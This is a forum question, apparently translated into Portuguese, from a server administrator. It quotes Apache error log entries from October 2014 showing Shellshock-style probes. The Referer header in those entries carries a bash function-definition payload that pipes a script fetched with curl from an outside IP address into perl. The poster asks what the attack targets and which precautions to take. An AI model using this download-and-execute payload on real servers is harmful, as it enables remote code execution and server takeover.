Normalmente, meus logs de erro do Apache são atingidos com um grande volume do típico 'phpmyadmin' (solicitações e um grande número de variações ortográficas), o wordpress admin, o joomla e uma carga completa maior.
Mas ontem à noite meu servidor foi atingido com um volume incomumente alto de um novo tipo:
[Mon Oct 27 20:22:58 2014] [error] [client 46.105.118.179] File does not exist: /var/www/details.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
e
[Mon Oct 27 20:22:59 2014] [error] [client 46.105.118.179] script not found or unable to stat: /usr/lib/cgi-bin/zml.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | p$
Todos eles são após pequenas variações dos dois acima.
Alguém mais viu isso? O que eles estão procurando? Há alguma precaução adicional de segurança que eu possa colocar em prática para esses ataques?
Tags logging apache-2.4